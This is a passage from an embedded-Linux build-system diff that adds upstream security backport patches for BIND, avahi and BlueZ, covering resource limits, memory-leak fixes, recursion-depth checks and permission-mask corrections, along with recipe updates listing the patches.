++        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\\",
+         "gurke",
+         "-",
+         " #",
+Index: avahi-0.7/avahi-common/alternative.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/alternative.c
++++ avahi-0.7/avahi-common/alternative.c
+@@ -49,15 +49,20 @@ static void drop_incomplete_utf8(char *c
+ }
+ 
+ char *avahi_alternative_host_name(const char *s) {
++    char label[AVAHI_LABEL_MAX], alternative[AVAHI_LABEL_MAX*4+1];
++    char *alt, *r, *ret;
+     const char *e;
+-    char *r;
++    size_t len;
+ 
+     assert(s);
+ 
+     if (!avahi_is_valid_host_name(s))
+         return NULL;
+ 
+-    if ((e = strrchr(s, '-'))) {
++    if (!avahi_unescape_label(&s, label, sizeof(label)))
++        return NULL;
++
++    if ((e = strrchr(label, '-'))) {
+         const char *p;
+ 
+         e++;
+@@ -74,19 +79,18 @@ char *avahi_alternative_host_name(const
+ 
+     if (e) {
+         char *c, *m;
+-        size_t l;
+         int n;
+ 
+         n = atoi(e)+1;
+         if (!(m = avahi_strdup_printf("%i", n)))
+             return NULL;
+ 
+-        l = e-s-1;
++        len = e-label-1;
+ 
+-        if (l >= AVAHI_LABEL_MAX-1-strlen(m)-1)
+-            l = AVAHI_LABEL_MAX-1-strlen(m)-1;
++        if (len >= AVAHI_LABEL_MAX-1-strlen(m)-1)
++            len = AVAHI_LABEL_MAX-1-strlen(m)-1;
+ 
+-        if (!(c = avahi_strndup(s, l))) {
++        if (!(c = avahi_strndup(label, len))) {
+             avahi_free(m);
+             return NULL;
+         }
+@@ -100,7 +104,7 @@ char *avahi_alternative_host_name(const
+     } else {
+         char *c;
+ 
+-        if (!(c = avahi_strndup(s, AVAHI_LABEL_MAX-1-2)))
++        if (!(c = avahi_strndup(label, AVAHI_LABEL_MAX-1-2)))
+             return NULL;
+ 
+         drop_incomplete_utf8(c);
+@@ -109,6 +113,13 @@ char *avahi_alternative_host_name(const
+         avahi_free(c);
+     }
+ 
++    alt = alternative;
++    len = sizeof(alternative);
++    ret = avahi_escape_label(r, strlen(r), &alt, &len);
++
++    avahi_free(r);
++    r = avahi_strdup(ret);
++
+     assert(avahi_is_valid_host_name(r));
+ 
+     return r;
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch b/meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch
new file mode 100644
index 0000000000..940c6776d3
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch
@@ -0,0 +1,67 @@
+From 36c878a0124973f29b7ca49e6bb18310f9b2601f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Micha=C5=82=20K=C4=99pie=C5=84?= <michal@isc.org>
+Date: Thu, 8 Sep 2022 11:11:30 +0200
+Subject: [PATCH 1/3] Bound the amount of work performed for delegations
+
+Limit the amount of database lookups that can be triggered in
+fctx_getaddresses() (i.e. when determining the name server addresses to
+query next) by setting a hard limit on the number of NS RRs processed
+for any delegation encountered.  Without any limit in place, named can
+be forced to perform large amounts of database lookups per each query
+received, which severely impacts resolver performance.
+
+The limit used (20) is an arbitrary value that is considered to be big
+enough for any sane DNS delegation.
+
+(cherry picked from commit 3a44097fd6c6c260765b628cd1d2c9cb7efb0b2a)
+
+Upstream-Status: Backport
+CVE: CVE-2022-2795
+Reference to upstream patch:
+https://gitlab.isc.org/isc-projects/bind9/-/commit/bf2ea6d8525bfd96a84dad221ba9e004adb710a8
+
+Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
+---
+ lib/dns/resolver.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+diff --git a/lib/dns/resolver.c b/lib/dns/resolver.c
+index 8ae9a993bbd7..ac9a9ef5d009 100644
+--- a/lib/dns/resolver.c
++++ b/lib/dns/resolver.c
+@@ -180,6 +180,12 @@
+  */
+ #define NS_FAIL_LIMIT 4
+ #define NS_RR_LIMIT   5
++/*
++ * IP address lookups are performed for at most NS_PROCESSING_LIMIT NS RRs in
++ * any NS RRset encountered, to avoid excessive resource use while processing
++ * large delegations.
++ */
++#define NS_PROCESSING_LIMIT 20
+ 
+ /* Number of hash buckets for zone counters */
+ #ifndef RES_DOMAIN_BUCKETS
+@@ -3318,6 +3324,7 @@ fctx_getaddresses(fetchctx_t *fctx, bool badcache) {
+ 	bool need_alternate = false;
+ 	bool all_spilled = true;
+ 	unsigned int no_addresses = 0;
++	unsigned int ns_processed = 0;
+ 
+ 	FCTXTRACE5("getaddresses", "fctx->depth=", fctx->depth);
+ 
+@@ -3504,6 +3511,11 @@ fctx_getaddresses(fetchctx_t *fctx, bool badcache) {
+ 
+ 		dns_rdata_reset(&rdata);
+ 		dns_rdata_freestruct(&ns);
++
++		if (++ns_processed >= NS_PROCESSING_LIMIT) {
++			result = ISC_R_NOMORE;
++			break;
++		}
+ 	}
+ 	if (result != ISC_R_NOMORE) {
+ 		return (result);
+-- 
+2.34.1
+
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch b/meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch
new file mode 100644
index 0000000000..0ef87fd260
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch
@@ -0,0 +1,31 @@
+From ef3d1a84ff807eea27b4fef601a15932c5ffbfbf Mon Sep 17 00:00:00 2001
+From: Mark Andrews <marka@isc.org>
+Date: Thu, 11 Aug 2022 15:15:34 +1000
+Subject: [PATCH 2/3] Free eckey on siglen mismatch
+
+Upstream-Status: Backport
+CVE: CVE-2022-38177
+Reference to upstream patch:
+https://gitlab.isc.org/isc-projects/bind9/-/commit/5b2282afff760b1ed3471f6666bdfe8e1d34e590
+
+Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
+---
+ lib/dns/opensslecdsa_link.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/dns/opensslecdsa_link.c b/lib/dns/opensslecdsa_link.c
+index 83b5b51cd78c..7576e04ac635 100644
+--- a/lib/dns/opensslecdsa_link.c
++++ b/lib/dns/opensslecdsa_link.c
+@@ -224,7 +224,7 @@ opensslecdsa_verify(dst_context_t *dctx, const isc_region_t *sig) {
+ 		siglen = DNS_SIG_ECDSA384SIZE;
+ 
+ 	if (sig->length != siglen)
+-		return (DST_R_VERIFYFAILURE);
++		DST_RET(DST_R_VERIFYFAILURE);
+ 
+ 	if (!EVP_DigestFinal_ex(evp_md_ctx, digest, &dgstlen))
+ 		DST_RET (dst__openssl_toresult3(dctx->category,
+-- 
+2.34.1
+
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch b/meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch
new file mode 100644
index 0000000000..e0b398e24a
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch
@@ -0,0 +1,33 @@
+From 65f5b2f0162d5d2ab25f463aa14a8bae71ace3d9 Mon Sep 17 00:00:00 2001
+From: Mark Andrews <marka@isc.org>
+Date: Thu, 11 Aug 2022 15:28:13 +1000
+Subject: [PATCH 3/3] Free ctx on invalid siglen
+
+(cherry picked from commit 6ddb480a84836641a0711768a94122972c166825)
+
+Upstream-Status: Backport
+CVE: CVE-2022-38178
+Reference to upstream patch:
+https://gitlab.isc.org/isc-projects/bind9/-/commit/1af23378ebb11da2eb0f412e4563d6
+
+Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
+---
+ lib/dns/openssleddsa_link.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/dns/openssleddsa_link.c b/lib/dns/openssleddsa_link.c
+index 8b115ec283f0..b4fcd607c131 100644
+--- a/lib/dns/openssleddsa_link.c
++++ b/lib/dns/openssleddsa_link.c
+@@ -325,7 +325,7 @@ openssleddsa_verify(dst_context_t *dctx, const isc_region_t *sig) {
+ 		siglen = DNS_SIG_ED448SIZE;
+ 
+ 	if (sig->length != siglen)
+-		return (DST_R_VERIFYFAILURE);
++		DST_RET(ISC_R_NOTIMPLEMENTED);
+ 
+ 	isc_buffer_usedregion(buf, &tbsreg);
+ 
+-- 
+2.34.1
+
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch b/meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch
new file mode 100644
index 0000000000..6f6c104530
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch
@@ -0,0 +1,166 @@
+
+Upstream-Status: Backport [import from debian security.debian.org/debian-security/pool/updates/main/b/bind9/bind9_9.11.5.P4+dfsg-5.1+deb10u9.debian.tar.xz
+Upstream patch https://downloads.isc.org/isc/bind9/9.16.42/patches/0001-CVE-2023-2828.patch]
+Upstream Commit: https://github.com/isc-projects/bind9/commit/da0eafcdee52147e72d407cc3b9f179378ee1d3a
+CVE: CVE-2023-2828
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+
+---
+ lib/dns/rbtdb.c | 106 +++++++++++++++++++++++++++++++++-----------------------
+ 1 file changed, 63 insertions(+), 43 deletions(-)
+
+diff --git a/lib/dns/rbtdb.c b/lib/dns/rbtdb.c
+index b1b928c..3165e26 100644
+--- a/lib/dns/rbtdb.c
++++ b/lib/dns/rbtdb.c
+@@ -792,7 +792,7 @@ static void update_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
+ static void expire_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
+ 			  bool tree_locked, expire_t reason);
+ static void overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start,
+-			  isc_stdtime_t now, bool tree_locked);
++			  size_t purgesize, bool tree_locked);
+ static isc_result_t resign_insert(dns_rbtdb_t *rbtdb, int idx,
+ 				  rdatasetheader_t *newheader);
+ static void resign_delete(dns_rbtdb_t *rbtdb, rbtdb_version_t *version,
+@@ -6784,6 +6784,16 @@ addclosest(dns_rbtdb_t *rbtdb, rdatasetheader_t *newheader,
+ 
+ static dns_dbmethods_t zone_methods;
+ 
++static size_t
++rdataset_size(rdatasetheader_t *header) {
++	if (!NONEXISTENT(header)) {
++		return (dns_rdataslab_size((unsigned char *)header,
++					   sizeof(*header)));
++	}
++
++	return (sizeof(*header));
++}
++
+ static isc_result_t
+ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
+ 	    isc_stdtime_t now, dns_rdataset_t *rdataset, unsigned int options,
+@@ -6932,7 +6942,8 @@ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
+ 	}
+ 
+ 	if (cache_is_overmem)
+-		overmem_purge(rbtdb, rbtnode->locknum, now, tree_locked);
++		overmem_purge(rbtdb, rbtnode->locknum, rdataset_size(newheader),
++		              tree_locked);
+ 
+ 	NODE_LOCK(&rbtdb->node_locks[rbtnode->locknum].lock,
+ 		  isc_rwlocktype_write);
+@@ -6947,9 +6958,14 @@ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
+ 			cleanup_dead_nodes(rbtdb, rbtnode->locknum);
+ 
+ 		header = isc_heap_element(rbtdb->heaps[rbtnode->locknum], 1);
+-		if (header && header->rdh_ttl < now - RBTDB_VIRTUAL)
+-			expire_header(rbtdb, header, tree_locked,
+-				      expire_ttl);
++		if (header != NULL) {
++			dns_ttl_t rdh_ttl = header->rdh_ttl;
++
++			if (rdh_ttl < now - RBTDB_VIRTUAL) {
++				expire_header(rbtdb, header, tree_locked,
++					      expire_ttl);
++			}
++		}
+ 
+ 		/*
+ 		 * If we've been holding a write lock on the tree just for
+@@ -10388,54 +10404,58 @@ update_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
+ 	ISC_LIST_PREPEND(rbtdb->rdatasets[header->node->locknum], header, link);
+ }
+ 
++static size_t
++expire_lru_headers(dns_rbtdb_t *rbtdb, unsigned int locknum, size_t purgesize,
++		   bool tree_locked) {
++	rdatasetheader_t *header, *header_prev;
++	size_t purged = 0;
++
++	for (header = ISC_LIST_TAIL(rbtdb->rdatasets[locknum]);
++	     header != NULL && purged <= purgesize; header = header_prev)
++	{
++		header_prev = ISC_LIST_PREV(header, link);
++		/*
++		 * Unlink the entry at this point to avoid checking it
++		 * again even if it's currently used someone else and
++		 * cannot be purged at this moment.  This entry won't be
++		 * referenced any more (so unlinking is safe) since the
++		 * TTL was reset to 0.
++		 */
++		ISC_LIST_UNLINK(rbtdb->rdatasets[locknum], header, link);
++		size_t header_size = rdataset_size(header);
++		expire_header(rbtdb, header, tree_locked, expire_lru);
++		purged += header_size;
++	}
++
++	return (purged);
++}
++
+ /*%
+- * Purge some expired and/or stale (i.e. unused for some period) cache entries
+- * under an overmem condition.  To recover from this condition quickly, up to
+- * 2 entries will be purged.  This process is triggered while adding a new
+- * entry, and we specifically avoid purging entries in the same LRU bucket as
+- * the one to which the new entry will belong.  Otherwise, we might purge
+- * entries of the same name of different RR types while adding RRsets from a
+- * single response (consider the case where we're adding A and AAAA glue records
+- * of the same NS name).
+- */
++ * Purge some stale (i.e. unused for some period - LRU based cleaning) cache
++ * entries under the overmem condition.  To recover from this condition quickly,
++ * we cleanup entries up to the size of newly added rdata (passed as purgesize).
++ *
++ * This process is triggered while adding a new entry, and we specifically avoid
++ * purging entries in the same LRU bucket as the one to which the new entry will
++ * belong.  Otherwise, we might purge entries of the same name of different RR
++ * types while adding RRsets from a single response (consider the case where
++ * we're adding A and AAAA glue records of the same NS name).
++*/
+ static void
+-overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start,
+-	      isc_stdtime_t now, bool tree_locked)
++overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start, size_t purgesize,
++	      bool tree_locked)
+ {
+-	rdatasetheader_t *header, *header_prev;
+ 	unsigned int locknum;
+-	int purgecount = 2;
++	size_t purged = 0;
+ 
+ 	for (locknum = (locknum_start + 1) % rbtdb->node_lock_count;
+-	     locknum != locknum_start && purgecount > 0;
++	     locknum != locknum_start && purged <= purgesize;
+ 	     locknum = (locknum + 1) % rbtdb->node_lock_count) {
+ 		NODE_LOCK(&rbtdb->node_locks[locknum].lock,
+ 			  isc_rwlocktype_write);
+ 
+-		header = isc_heap_element(rbtdb->heaps[locknum], 1);
+-		if (header && header->rdh_ttl < now - RBTDB_VIRTUAL) {
+-			expire_header(rbtdb, header, tree_locked,
+-				      expire_ttl);
+-			purgecount--;
+-		}
+-
+-		for (header = ISC_LIST_TAIL(rbtdb->rdatasets[locknum]);
+-		     header != NULL && purgecount > 0;
+-		     header = header_prev) {
+-			header_prev = ISC_LIST_PREV(header, link);
+-			/*
+-			 * Unlink the entry at this point to avoid checking it
+-			 * again even if it's currently used someone else and
+-			 * cannot be purged at this moment.  This entry won't be
+-			 * referenced any more (so unlinking is safe) since the
+-			 * TTL was reset to 0.
+-			 */
+-			ISC_LIST_UNLINK(rbtdb->rdatasets[locknum], header,
+-					link);
+-			expire_header(rbtdb, header, tree_locked,
+-				      expire_lru);
+-			purgecount--;
+-		}
++		purged += expire_lru_headers(rbtdb, locknum, purgesize - purged,
++					     tree_locked);
+ 
+ 		NODE_UNLOCK(&rbtdb->node_locks[locknum].lock,
+ 				    isc_rwlocktype_write);
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch b/meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch
new file mode 100644
index 0000000000..be479cb00e
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch
@@ -0,0 +1,175 @@
+From c4fac5ca98efd02fbaef43601627c7a3a09f5a71 Mon Sep 17 00:00:00 2001
+From: Mark Andrews <marka@isc.org>
+Date: Tue, 20 Jun 2023 15:21:36 +1000
+Subject: [PATCH] Limit isccc_cc_fromwire recursion depth
+
+Named and rndc do not need a lot of recursion so the depth is
+set to 10.
+
+Taken from BIND 9.16.44 change.
+
+Upstream-Status: Backport [https://gitlab.isc.org/isc-projects/bind9/-/commit/c4fac5ca98efd02fbaef43601627c7a3a09f5a71]
+CVE: CVE-2023-3341
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/isccc/cc.c                   | 38 +++++++++++++++++++++++---------
+ lib/isccc/include/isccc/result.h |  4 +++-
+ lib/isccc/result.c               |  4 +++-
+ 3 files changed, 34 insertions(+), 12 deletions(-)
+
+diff --git a/lib/isccc/cc.c b/lib/isccc/cc.c
+index e012685..8eac3d6 100644
+--- a/lib/isccc/cc.c
++++ b/lib/isccc/cc.c
+@@ -53,6 +53,10 @@
+ 
+ #define MAX_TAGS		256
+ #define DUP_LIFETIME		900
++#ifndef ISCCC_MAXDEPTH
++#define ISCCC_MAXDEPTH \
++	10 /* Big enough for rndc which just sends a string each way. */
++#endif
+ 
+ typedef isccc_sexpr_t *sexpr_ptr;
+ 
+@@ -561,19 +565,25 @@ verify(isccc_sexpr_t *alist, unsigned char *data, unsigned int length,
+ 
+ static isc_result_t
+ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+-	       uint32_t algorithm, isccc_sexpr_t **alistp);
++	       uint32_t algorithm, unsigned int depth, isccc_sexpr_t **alistp);
+ 
+ static isc_result_t
+-list_fromwire(isccc_region_t *source, isccc_sexpr_t **listp);
++list_fromwire(isccc_region_t *source, unsigned int depth,
++	      isccc_sexpr_t **listp);
+ 
+ static isc_result_t
+-value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
++value_fromwire(isccc_region_t *source, unsigned int depth,
++	       isccc_sexpr_t **valuep) {
+ 	unsigned int msgtype;
+ 	uint32_t len;
+ 	isccc_sexpr_t *value;
+ 	isccc_region_t active;
+ 	isc_result_t result;
+ 
++	if (depth > ISCCC_MAXDEPTH) {
++		return (ISCCC_R_MAXDEPTH);
++	}
++
+ 	if (REGION_SIZE(*source) < 1 + 4)
+ 		return (ISC_R_UNEXPECTEDEND);
+ 	GET8(msgtype, source->rstart);
+@@ -591,9 +601,9 @@ value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
+ 		} else
+ 			result = ISC_R_NOMEMORY;
+ 	} else if (msgtype == ISCCC_CCMSGTYPE_TABLE)
+-		result = table_fromwire(&active, NULL, 0, valuep);
++		result = table_fromwire(&active, NULL, 0, depth + 1, valuep);
+ 	else if (msgtype == ISCCC_CCMSGTYPE_LIST)
+-		result = list_fromwire(&active, valuep);
++		result = list_fromwire(&active, depth + 1, valuep);
+ 	else
+ 		result = ISCCC_R_SYNTAX;
+ 
+@@ -602,7 +612,7 @@ value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
+ 
+ static isc_result_t
+ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+-	       uint32_t algorithm, isccc_sexpr_t **alistp)
++	       uint32_t algorithm, unsigned int depth, isccc_sexpr_t **alistp)
+ {
+ 	char key[256];
+ 	uint32_t len;
+@@ -613,6 +623,10 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+ 
+ 	REQUIRE(alistp != NULL && *alistp == NULL);
+ 
++	if (depth > ISCCC_MAXDEPTH) {
++		return (ISCCC_R_MAXDEPTH);
++	}
++
+ 	checksum_rstart = NULL;
+ 	first_tag = true;
+ 	alist = isccc_alist_create();
+@@ -628,7 +642,7 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+ 		GET_MEM(key, len, source->rstart);
+ 		key[len] = '\0';	/* Ensure NUL termination. */
+ 		value = NULL;
+-		result = value_fromwire(source, &value);
++		result = value_fromwire(source, depth + 1, &value);
+ 		if (result != ISC_R_SUCCESS)
+ 			goto bad;
+ 		if (isccc_alist_define(alist, key, value) == NULL) {
+@@ -661,14 +675,18 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+ }
+ 
+ static isc_result_t
+-list_fromwire(isccc_region_t *source, isccc_sexpr_t **listp) {
++list_fromwire(isccc_region_t *source, unsigned int depth, isccc_sexpr_t **listp) {
+ 	isccc_sexpr_t *list, *value;
+ 	isc_result_t result;
+ 
++	if (depth > ISCCC_MAXDEPTH) {
++		return (ISCCC_R_MAXDEPTH);
++	}
++
+ 	list = NULL;
+ 	while (!REGION_EMPTY(*source)) {
+ 		value = NULL;
+-		result = value_fromwire(source, &value);
++		result = value_fromwire(source, depth + 1, &value);
+ 		if (result != ISC_R_SUCCESS) {
+ 			isccc_sexpr_free(&list);
+ 			return (result);
+@@ -699,7 +717,7 @@ isccc_cc_fromwire(isccc_region_t *source, isccc_sexpr_t **alistp,
+ 	if (version != 1)
+ 		return (ISCCC_R_UNKNOWNVERSION);
+ 
+-	return (table_fromwire(source, secret, algorithm, alistp));
++	return (table_fromwire(source, secret, algorithm, 0, alistp));
+ }
+ 
+ static isc_result_t
+diff --git a/lib/isccc/include/isccc/result.h b/lib/isccc/include/isccc/result.h
+index 6c79dd7..a85861c 100644
+--- a/lib/isccc/include/isccc/result.h
++++ b/lib/isccc/include/isccc/result.h
+@@ -47,8 +47,10 @@
+ #define ISCCC_R_CLOCKSKEW		(ISC_RESULTCLASS_ISCCC + 4)
+ /*% Duplicate */
+ #define ISCCC_R_DUPLICATE		(ISC_RESULTCLASS_ISCCC + 5)
++/*% Maximum recursion depth */
++#define ISCCC_R_MAXDEPTH               (ISC_RESULTCLASS_ISCCC + 6)
+ 
+-#define ISCCC_R_NRESULTS 		6	/*%< Number of results */
++#define ISCCC_R_NRESULTS 		7	/*%< Number of results */
+ 
+ ISC_LANG_BEGINDECLS
+ 
+diff --git a/lib/isccc/result.c b/lib/isccc/result.c
+index 8419bbb..325200b 100644
+--- a/lib/isccc/result.c
++++ b/lib/isccc/result.c
+@@ -40,7 +40,8 @@ static const char *text[ISCCC_R_NRESULTS] = {
+ 	"bad auth",				/* 3 */
+ 	"expired",				/* 4 */
+ 	"clock skew",				/* 5 */
+-	"duplicate"				/* 6 */
++	"duplicate",				/* 6 */
++	"max depth",				/* 7 */
+ };
+ 
+ static const char *ids[ISCCC_R_NRESULTS] = {
+@@ -50,6 +51,7 @@ static const char *ids[ISCCC_R_NRESULTS] = {
+ 	"ISCCC_R_EXPIRED",
+ 	"ISCCC_R_CLOCKSKEW",
+ 	"ISCCC_R_DUPLICATE",
++	"ISCCC_R_MAXDEPTH",
+ };
+ 
+ #define ISCCC_RESULT_RESULTSET			2
+-- 
+2.25.1
+
diff --git a/meta/recipes-connectivity/bind/bind_9.11.22.bb b/meta/recipes-connectivity/bind/bind_9.11.37.bb
index 3b4a299b36..95bb5be005 100644
--- a/meta/recipes-connectivity/bind/bind_9.11.22.bb
+++ b/meta/recipes-connectivity/bind/bind_9.11.37.bb
@@ -1,9 +1,10 @@
 SUMMARY = "ISC Internet Domain Name Server"
 HOMEPAGE = "https://www.isc.org/bind/"
+DESCRIPTION = "BIND 9 provides a full-featured Domain Name Server system"
 SECTION = "console/network"
 
 LICENSE = "ISC & BSD"
-LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=bf39058a7f64b2a934ce14dc9ec1dd45"
+LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=89a97ebbf713f7125fe5c02223d3ae95"
 
 DEPENDS = "openssl libcap zlib"
 
@@ -18,9 +19,14 @@ SRC_URI = "https://ftp.isc.org/isc/bind9/${PV}/${BPN}-${PV}.tar.gz \
            file://0001-configure.in-remove-useless-L-use_openssl-lib.patch \
            file://0001-named-lwresd-V-and-start-log-hide-build-options.patch \
            file://0001-avoid-start-failure-with-bind-user.patch \
+           file://CVE-2022-2795.patch \
+           file://CVE-2022-38177.patch \
+           file://CVE-2022-38178.patch \
+           file://CVE-2023-2828.patch \
+           file://CVE-2023-3341.patch \
            "
 
-SRC_URI[sha256sum] = "afc6d8015006f1cabf699ff19f517bb8fd9c1811e5231f26baf51c3550262ac9"
+SRC_URI[sha256sum] = "0d8efbe7ec166ada90e46add4267b7e7c934790cba9bd5af6b8380a4fbfb5aff"
 
 UPSTREAM_CHECK_URI = "https://ftp.isc.org/isc/bind9/"
 # stay at 9.11 until 9.16, from 9.16 follow the ESV versions divisible by 4
diff --git a/meta/recipes-connectivity/bluez5/bluez5.inc b/meta/recipes-connectivity/bluez5/bluez5.inc
index f34ba0dce5..74fd344170 100644
--- a/meta/recipes-connectivity/bluez5/bluez5.inc
+++ b/meta/recipes-connectivity/bluez5/bluez5.inc
@@ -7,6 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
                     file://COPYING.LIB;md5=fb504b67c50331fc78734fed90fb0e09 \
                     file://src/main.c;beginline=1;endline=24;md5=9bc54b93cd7e17bf03f52513f39f926e"
 DEPENDS = "dbus glib-2.0"
+RDEPENDS:${PN} += "dbus"
 PROVIDES += "bluez-hcidump"
 RPROVIDES_${PN} += "bluez-hcidump"
 
@@ -52,6 +53,13 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/bluetooth/bluez-${PV}.tar.xz \
            ${@bb.utils.contains('DISTRO_FEATURES', 'systemd', '', 'file://0001-Allow-using-obexd-without-systemd-in-the-user-sessio.patch', d)} \
            file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \
            file://0001-test-gatt-Fix-hung-issue.patch \
+           file://CVE-2021-0129.patch \
+           file://CVE-2021-3588.patch \
+          file://CVE-2021-3658.patch \
+           file://CVE-2022-0204.patch \
+           file://CVE-2022-39176.patch \
+           file://CVE-2022-3637.patch \
+           file://CVE-2023-45866.patch \
            "
 S = "${WORKDIR}/bluez-${PV}"
 
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch
new file mode 100644
index 0000000000..b39730dc10
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch
@@ -0,0 +1,109 @@
+From 00da0fb4972cf59e1c075f313da81ea549cb8738 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 2 Mar 2021 11:38:33 -0800
+Subject: shared/gatt-server: Fix not properly checking for secure flags
+
+When passing the mask to check_permissions all valid permissions for
+the operation must be set including BT_ATT_PERM_SECURE flags.
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/patch/?id=00da0fb4972cf59e1c075f313da81ea549cb8738]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+CVE: CVE-2021-0129
+---
+ src/shared/att-types.h   |  8 ++++++++
+ src/shared/gatt-server.c | 25 +++++++------------------
+ 2 files changed, 15 insertions(+), 18 deletions(-)
+
+diff --git a/src/shared/att-types.h b/src/shared/att-types.h
+index 7108b4e94..3adc05d9e 100644
+--- a/src/shared/att-types.h
++++ b/src/shared/att-types.h
+@@ -129,6 +129,14 @@ struct bt_att_pdu_error_rsp {
+ #define BT_ATT_PERM_WRITE_SECURE	0x0200
+ #define BT_ATT_PERM_SECURE		(BT_ATT_PERM_READ_SECURE | \
+ 					BT_ATT_PERM_WRITE_SECURE)
++#define BT_ATT_PERM_READ_MASK		(BT_ATT_PERM_READ | \
++					BT_ATT_PERM_READ_AUTHEN | \
++					BT_ATT_PERM_READ_ENCRYPT | \
++					BT_ATT_PERM_READ_SECURE)
++#define BT_ATT_PERM_WRITE_MASK		(BT_ATT_PERM_WRITE | \
++					BT_ATT_PERM_WRITE_AUTHEN | \
++					BT_ATT_PERM_WRITE_ENCRYPT | \
++					BT_ATT_PERM_WRITE_SECURE)
+ 
+ /* GATT Characteristic Properties Bitfield values */
+ #define BT_GATT_CHRC_PROP_BROADCAST			0x01
+diff --git a/src/shared/gatt-server.c b/src/shared/gatt-server.c
+index b5f7de7dc..970c35f94 100644
+--- a/src/shared/gatt-server.c
++++ b/src/shared/gatt-server.c
+@@ -444,9 +444,7 @@ static void process_read_by_type(struct async_read_op *op)
+ 		return;
+ 	}
+ 
+-	ecode = check_permissions(server, attr, BT_ATT_PERM_READ |
+-						BT_ATT_PERM_READ_AUTHEN |
+-						BT_ATT_PERM_READ_ENCRYPT);
++	ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK);
+ 	if (ecode)
+ 		goto error;
+ 
+@@ -811,9 +809,7 @@ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
+ 				(opcode == BT_ATT_OP_WRITE_REQ) ? "Req" : "Cmd",
+ 				handle);
+ 
+-	ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE |
+-						BT_ATT_PERM_WRITE_AUTHEN |
+-						BT_ATT_PERM_WRITE_ENCRYPT);
++	ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ 	if (ecode)
+ 		goto error;
+ 
+@@ -913,9 +909,7 @@ static void handle_read_req(struct bt_att_chan *chan,
+ 			opcode == BT_ATT_OP_READ_BLOB_REQ ? "Blob " : "",
+ 			handle);
+ 
+-	ecode = check_permissions(server, attr, BT_ATT_PERM_READ |
+-						BT_ATT_PERM_READ_AUTHEN |
+-						BT_ATT_PERM_READ_ENCRYPT);
++	ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK);
+ 	if (ecode)
+ 		goto error;
+ 
+@@ -1051,9 +1045,8 @@ static void read_multiple_complete_cb(struct gatt_db_attribute *attr, int err,
+ 		goto error;
+ 	}
+ 
+-	ecode = check_permissions(data->server, next_attr, BT_ATT_PERM_READ |
+-						BT_ATT_PERM_READ_AUTHEN |
+-						BT_ATT_PERM_READ_ENCRYPT);
++	ecode = check_permissions(data->server, next_attr,
++						BT_ATT_PERM_READ_MASK);
+ 	if (ecode)
+ 		goto error;
+ 
+@@ -1129,9 +1122,7 @@ static void read_multiple_cb(struct bt_att_chan *chan, uint8_t opcode,
+ 		goto error;
+ 	}
+ 
